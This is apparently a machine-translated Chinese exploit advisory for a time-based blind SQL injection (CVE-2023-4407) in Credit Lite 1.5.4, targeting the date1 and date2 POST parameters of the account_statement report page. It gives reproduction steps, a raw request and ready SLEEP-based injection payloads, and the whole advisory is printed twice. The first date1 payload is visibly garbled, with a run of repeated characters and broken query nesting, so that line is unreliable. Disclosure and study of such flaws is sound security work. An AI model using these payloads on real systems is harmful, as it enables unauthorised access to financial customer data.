#利用标题: Credit Lite 1.5.4- SQL注入
#利用作者:饼干
#日期: 31/07/2023
#vendor:爱好技术
#供应商HomePage3360 https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392
#软件link: https://credit-lite.appshat.xyz/
#版本: 1.5.4
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4407
#CWE: CWE-89-CWE-74-CWE-707
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
##复制步骤:
收集邮政请求
1。请访问此路径上的[帐户说明] : https://website/portal/portal/reports/account_statement
2。选择[开始日期] + [结束日期] + [帐号],然后单击[过滤器]
PATH:/PORTAL/REPORTION/account_statement
后参数“ date1”很容易受到SQL注入的影响
后参数“ date2”很容易受到SQL注入的影响
------------------------------------------------------------------------------------------------------------------------
POST/PORTAL/REPORTION/ACCOUNT_STATEMENT HTTP/2
_token=5K2IFXRQ8AUEUQZRD5UFILSZZGOC5VYCPGXTTZDKDATE1=[SQLI] date2=[SQLI] counduct_number=20005001
------------------------------------------------------------------------------------------------------------------------
---
参数:日期1(邮政)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: _token=5K2IFXRQ8AUEUQZRD5UFILSZZGOC5VYCPGXTTZDKDATE1=2023-07-07-31'XOR(SELECT(SELECT(0)from(Select(Select(select(5))Xor'zdate2=2023-3-07-07-31Accccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccced=20005 0001
参数: Date2(邮政)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDKdate1=2023-07-31date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9))))a)XOR'Zaccount_number=20005001
---
[-] 完毕
#利用作者:饼干
#日期: 31/07/2023
#vendor:爱好技术
#供应商HomePage3360 https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392
#软件link: https://credit-lite.appshat.xyz/
#版本: 1.5.4
#测试在: Windows 10 Pro
#Impact:数据库访问
#CVE: CVE-2023-4407
#CWE: CWE-89-CWE-74-CWE-707
## 描述
SQL注入攻击可以允许未经授权访问敏感数据,修改
数据并崩溃应用程序或使其无法使用,导致收入损失,并且
损害公司声誉。
##复制步骤:
收集邮政请求
1。请访问此路径上的[帐户说明] : https://website/portal/portal/reports/account_statement
2。选择[开始日期] + [结束日期] + [帐号],然后单击[过滤器]
PATH:/PORTAL/REPORTION/account_statement
后参数“ date1”很容易受到SQL注入的影响
后参数“ date2”很容易受到SQL注入的影响
------------------------------------------------------------------------------------------------------------------------
POST/PORTAL/REPORTION/ACCOUNT_STATEMENT HTTP/2
_token=5K2IFXRQ8AUEUQZRD5UFILSZZGOC5VYCPGXTTZDKDATE1=[SQLI] date2=[SQLI] counduct_number=20005001
------------------------------------------------------------------------------------------------------------------------
---
参数:日期1(邮政)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
payload: _token=5K2IFXRQ8AUEUQZRD5UFILSZZGOC5VYCPGXTTZDKDATE1=2023-07-07-31'XOR(SELECT(SELECT(0)from(Select(Select(select(5))Xor'zdate2=2023-3-07-07-31Accccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccced=20005 0001
参数: Date2(邮政)
Type:基于时间的盲人
title: mysql=5.0.12基于时间的盲人(查询睡眠)
Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDKdate1=2023-07-31date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9))))a)XOR'Zaccount_number=20005001
---
[-] 完毕
